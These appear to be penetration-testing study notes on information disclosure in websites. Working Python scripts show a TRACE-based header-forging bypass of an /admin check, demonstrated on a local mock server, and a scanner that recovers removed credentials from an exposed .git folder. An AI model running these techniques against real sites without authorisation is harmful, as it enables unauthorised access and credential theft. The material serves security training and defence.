Information Disclosure

The unintentional release of sensitive information by a website, for example user data, source code, internal file paths or configuration details that an attacker can use to plan further attacks.

Test for information disclosure

  • Fuzzing: submit unexpected input (wrong types, long strings, special characters) to each parameter and compare the responses for differences in status code, length or error text.

  • Burp's engagement tools: Search, Find comments and Discover content.

  • Engineering informative responses: deliberately provoke errors (invalid parameters, non-existent resources, malformed requests) so the application reveals stack traces or other internal details.

Common sources of information disclosure

Files for Web Crawlers

Check /robots.txt and /sitemap.xml. They list paths the site owner wanted crawlers to skip or index, and those lists often name admin, backup or staging areas that are not linked from the site itself.

Directory Listings

Web servers can be configured to automatically list the contents of directories that have no index page. Request directory paths directly and look for an automatically generated listing ("Index of /...").

Developer Comments

Inline HTML and JavaScript comments sometimes mention hidden paths, credentials, disabled features or TODO notes about known weaknesses.

Error Messages

Verbose error messages can reveal the technology stack, framework versions, file paths, SQL queries or internal object names, each of which narrows down further attacks.

Debugging Data

Debug output in custom error pages or verbose logging intended for developers (variable dumps, session state, file paths) is sometimes left enabled in production.

User Account Pages

As with IDOR vulnerabilities, an attacker can reach other users' information when the account page selects the user by a parameter the attacker controls; change the user identifier in the request and check whether another user's data is returned.

Backup Files

Backup copies of source files (for example with .bak, .old or ~ suffixes) are served as plain text instead of being executed, and the source they expose sometimes contains hard-coded credentials or keys.
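A worked example, added here and not part of the original page, of the checks above (directory listings, developer comments, error messages, debugging output and backup files) run over one constructed HTTP response body. The sample body, the regex signatures and the function names are my own choices; the signatures are heuristics to be tuned for the target stack.

```python
import re

# Constructed sample response (not captured from any real site) that mixes several
# disclosure sources: a directory listing, backup files, comments and a PHP error.
SAMPLE_BODY = """<html><head><title>Index of /backup</title></head>
<body><h1>Index of /backup</h1>
<pre><a href="app.php.bak">app.php.bak</a>  2021-03-01 12:00  4.2K
<a href="config.php~">config.php~</a>
<a href="dump.sql">dump.sql</a></pre>
<!-- TODO: remove debug endpoint /debug/vars before release -->
<script src="https://cdn.example.invalid/lib.js"></script>
<script>
// legacy auth key kept for the mobile client: sk_test_placeholder
var x = 1; /* DB host is db-internal.corp */
</script>
<p>Fatal error: Uncaught PDOException: SQLSTATE[HY000] in /var/www/html/app.php:42</p>
</body></html>"""

HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)
# Anchored at line start so the "//" inside "https://..." is not taken for a comment.
JS_LINE_COMMENT = re.compile(r"(?m)^\s*//(.*)$")
JS_BLOCK_COMMENT = re.compile(r"/\*(.*?)\*/", re.S)

# Signatures of verbose errors and debug output; each is a heuristic, not a proof.
ERROR_SIGNATURES = {
    "php_fatal": re.compile(r"Fatal error:|Warning:.*? on line \d+"),
    "uncaught_exception": re.compile(r"Uncaught [\w\\]+Exception"),
    "sqlstate": re.compile(r"SQLSTATE\[\w+\]"),
    "python_traceback": re.compile(r"Traceback \(most recent call last\)"),
    "java_stack": re.compile(r"\bat [\w$.]+\([\w$]+\.java:\d+\)"),
    "aspnet_error": re.compile(r"Server Error in '.*?' Application"),
    # Absolute server-side paths, optionally with a line number.
    "path_disclosure": re.compile(
        r"(?:/(?:var|home|usr|etc|opt|srv|app)(?:/[\w.-]+)+|[A-Za-z]:\\[\w.\\-]+)(?::\d+)?"),
}

BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".swp", ".sql", ".zip", ".tar.gz", "~")
DIRLISTING = re.compile(r"<title>Index of /|Directory listing for /|Parent Directory", re.I)


def extract_comments(body):
    """Return the text of HTML, JavaScript line and JavaScript block comments."""
    found = []
    for rx in (HTML_COMMENT, JS_LINE_COMMENT, JS_BLOCK_COMMENT):
        found += [m.group(1).strip() for m in rx.finditer(body)]
    return found


def find_error_signatures(body):
    """Return (signature name, first matching text) for every signature that fires."""
    hits = []
    for name, rx in ERROR_SIGNATURES.items():
        m = rx.search(body)
        if m:
            hits.append((name, m.group(0)))
    return hits


def is_directory_listing(body):
    return bool(DIRLISTING.search(body))


def find_backup_links(body):
    """Links in a listing or page that point at backup/editor-leftover files."""
    links = re.findall(r'href="([^"]+)"', body)
    return [link for link in links if link.lower().endswith(BACKUP_SUFFIXES)]


def analyse(body):
    return {
        "directory_listing": is_directory_listing(body),
        "backup_links": find_backup_links(body),
        "comments": extract_comments(body),
        "errors": find_error_signatures(body),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_BODY).items():
        print(f"{key}: {value}")
```

Run it over saved responses (Burp's site map export, or a crawler's output) rather than a single page; the comment extractor and error signatures are where most of the findings come from in practice, and the path regex is deliberately restricted to common roots so URLs are not reported as path disclosure.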

Insecure Configuration

Test the HTTP "TRACE" method: the server echoes the request back as it arrived at the back end, including headers a front-end proxy added on the way. In the classic case, TRACE /admin reveals a header such as X-Custom-IP-Authorization carrying the client's IP address; sending that header yourself with the value 127.0.0.1 makes the back end treat the request as local and enables access to "/admin".
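An added example, not from the original page, that plays the TRACE exchange and the header replay end to end. A small Python server stands in for a front end that stamps a client-IP header plus a back end that trusts that header for /admin; the server, the stamped address 203.0.113.5 and the function names are constructed for the demo, while the header name is the one from the text above.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

AUTH_HEADER = "X-Custom-IP-Authorization"   # header name from the text
FAKE_CLIENT_IP = "203.0.113.5"               # constructed "external" client address


class VulnerableStack(BaseHTTPRequestHandler):
    """Hypothetical front end + back end in one handler: the front end stamps the
    client's address into AUTH_HEADER, the back end trusts that header for /admin."""
    protocol_version = "HTTP/1.1"

    def _front_end(self):
        # The flaw: the header is only added when absent, never overwritten, so a
        # client-supplied value reaches the back end untouched.
        if AUTH_HEADER not in self.headers:
            self.headers[AUTH_HEADER] = FAKE_CLIENT_IP

    def do_TRACE(self):
        # TRACE echoes the request as the back end received it, including the header
        # the front end added: that is the information disclosure.
        self._front_end()
        echo = self.requestline + "\r\n" + "".join(
            f"{k}: {v}\r\n" for k, v in self.headers.items())
        self._reply(200, echo.encode(), "message/http")

    def do_GET(self):
        self._front_end()
        if self.path != "/admin":
            return self._reply(404, b"not found\n")
        if self.headers[AUTH_HEADER] == "127.0.0.1":
            return self._reply(200, b"admin panel\n")
        self._reply(401, b"unauthorized\n")

    def _reply(self, status, body, ctype="text/plain"):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


def request(port, method, path, headers=None):
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request(method, path, headers=headers or {})
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


def headers_added_by_front_end(port):
    """Step 1: TRACE the protected path and keep every echoed header we did not
    send ourselves (http.client adds Host and Accept-Encoding on its own)."""
    _, echo = request(port, "TRACE", "/admin")
    ours = {"host", "accept-encoding"}
    added = {}
    for line in echo.splitlines()[1:]:           # skip the echoed request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() not in ours:
            added[name.strip()] = value.strip()
    return added


def bypass(port):
    """Step 2: replay GET /admin with the discovered header set to 127.0.0.1."""
    added = headers_added_by_front_end(port)
    name = next((h for h in added if h.lower() == AUTH_HEADER.lower()), None)
    if name is None:
        return None
    return request(port, "GET", "/admin", {name: "127.0.0.1"})


def run_demo():
    """Start the vulnerable stack on a loopback port and return
    (GET /admin before, headers leaked by TRACE, GET /admin with forged header)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), VulnerableStack)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    port = srv.server_address[1]
    try:
        before = request(port, "GET", "/admin")
        leaked = headers_added_by_front_end(port)
        after = bypass(port)
    finally:
        srv.shutdown()
        srv.server_close()
    return before, leaked, after


if __name__ == "__main__":
    before, leaked, after = run_demo()
    print("GET /admin without header:", before)
    print("headers revealed by TRACE:", leaked)
    print("GET /admin with forged header:", after)
```

Against a real target the same two steps apply: diff the TRACE echo against the request you actually sent, and replay any header that only appears in the echo. The fix on the server side is to disable TRACE and, more importantly, to have the front end overwrite the header unconditionally rather than trust a client-supplied value.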

Version Control History

Check for an exposed ".git" folder. Downloading it gives the complete history, and sensitive data is sometimes found hard-coded in lines that a later commit changed or removed.

Useful commands

$ git status     (which files differ from the last commit)
$ git log        (list the commits in the history)
$ git checkout   (switch to an older commit to inspect the files it contained)
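An added example, not from the original page, of reading an exposed .git folder without the git client: it resolves HEAD, walks the commits, flattens each tree and reports lines that a later commit removed, then filters those for credential-looking assignments. The two-commit repository it builds (a password committed and then taken out) is constructed for the demo, and the object-writing helper only exists to build that sample; the regex and function names are my own.

```python
import hashlib
import os
import re
import tempfile
import zlib
# Heuristic for credential-looking assignments; tune to the target.
SECRET_RX = re.compile(r"(?i)(passw(or)?d|secret|api[_-]?key|token)\s*=\s*\S+")

def write_object(gitdir, typ, content):
    """Store a loose object exactly as git does: zlib("<type> <size>\\0" + content)."""
    raw = f"{typ} {len(content)}\0".encode() + content
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha

def read_object(gitdir, sha):
    """Inverse of write_object; works on any exposed .git copied to disk."""
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    header, content = raw.split(b"\0", 1)
    return header.split()[0].decode(), content

def build_sample_repo(root):
    """Constructed two-commit history: a password committed, then removed."""
    gitdir = os.path.join(root, ".git")
    def commit(files, message, parent=None):
        entries = b"".join(
            f"100644 {name}\0".encode() + bytes.fromhex(write_object(gitdir, "blob", files[name]))
            for name in sorted(files))
        tree = write_object(gitdir, "tree", entries)
        body = f"tree {tree}\n" + (f"parent {parent}\n" if parent else "")
        body += ("author Dev <dev@example.invalid> 0 +0000\n"
                 "committer Dev <dev@example.invalid> 0 +0000\n\n" + message + "\n")
        return write_object(gitdir, "commit", body.encode())
    c1 = commit({"config.env": b"DB_HOST=db\nDB_PASSWORD=hunter2\n"}, "add config")
    c2 = commit({"config.env": b"DB_HOST=db\nDB_PASSWORD_FILE=/run/secrets/db\n"},
                "stop hard-coding the password", c1)
    os.makedirs(os.path.join(gitdir, "refs", "heads"))
    with open(os.path.join(gitdir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/main\n")
    with open(os.path.join(gitdir, "refs", "heads", "main"), "w") as f:
        f.write(c2 + "\n")
    return gitdir

def resolve_head(gitdir):
    with open(os.path.join(gitdir, "HEAD")) as f:
        head = f.read().strip()
    if head.startswith("ref: "):                    # symbolic ref: read the branch file
        with open(os.path.join(gitdir, head[5:])) as f:
            return f.read().strip()
    return head                                     # detached HEAD holds the hash itself

def parse_commit(gitdir, sha):
    """Return ({header: [values]}, message) for a commit object."""
    headers, _, message = read_object(gitdir, sha)[1].decode().partition("\n\n")
    meta = {}
    for line in headers.splitlines():
        key, _, value = line.partition(" ")
        meta.setdefault(key, []).append(value)
    return meta, message.strip()

def tree_files(gitdir, tree_sha, prefix=""):
    """Flatten a tree object into {path: blob_sha}, recursing into sub-trees."""
    data, files, i = read_object(gitdir, tree_sha)[1], {}, 0
    while i < len(data):
        nul = data.index(b"\0", i)
        mode, name = data[i:nul].decode().split(" ", 1)
        sha, i = data[nul + 1:nul + 21].hex(), nul + 21   # 20 raw SHA-1 bytes follow the NUL
        if mode == "40000":
            files.update(tree_files(gitdir, sha, prefix + name + "/"))
        else:
            files[prefix + name] = sha
    return files

def removed_lines(gitdir):
    """Walk first-parent history from HEAD; return (message, path, line) for each
    line a commit deleted, i.e. the changed-lines view of the history."""
    sha, out = resolve_head(gitdir), []
    while sha:
        meta, message = parse_commit(gitdir, sha)
        parent = meta.get("parent", [None])[0]
        new = tree_files(gitdir, meta["tree"][0])
        old = tree_files(gitdir, parse_commit(gitdir, parent)[0]["tree"][0]) if parent else {}
        for path, blob in old.items():
            if new.get(path) == blob:
                continue                            # file unchanged in this commit
            before = read_object(gitdir, blob)[1].decode().splitlines()
            after = read_object(gitdir, new[path])[1].decode().splitlines() if path in new else []
            out += [(message, path, line) for line in before if line not in after]
        sha = parent
    return out

def find_secrets(gitdir):
    return [hit for hit in removed_lines(gitdir) if SECRET_RX.search(hit[2])]

def demo():
    """Build the sample repository in a temp dir and scan it."""
    return find_secrets(build_sample_repo(tempfile.mkdtemp()))
```

Call demo() to see the removed password reported with the commit that removed it. On a real exposed .git, point find_secrets at the downloaded folder; objects stored in packfiles rather than as loose objects are not handled here, which is where running the page's git commands on the downloaded copy is the quicker route.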
